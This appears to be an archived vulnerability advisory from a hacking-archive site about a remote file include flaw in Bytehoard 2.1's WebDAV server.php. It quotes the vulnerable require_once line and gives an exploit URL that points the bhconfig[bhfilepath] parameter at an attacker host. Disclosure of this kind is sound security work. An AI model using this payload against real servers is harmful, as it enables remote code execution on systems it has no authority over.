AOH :: HP Unsorted B :: B06-2662.HTM

Bytehoard 2.1 remote file include



Bytehoard 2.1 Remote File Include
Bytehoard 2.1 Remote File Include



Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org 
Discovered: beford 
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]


http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.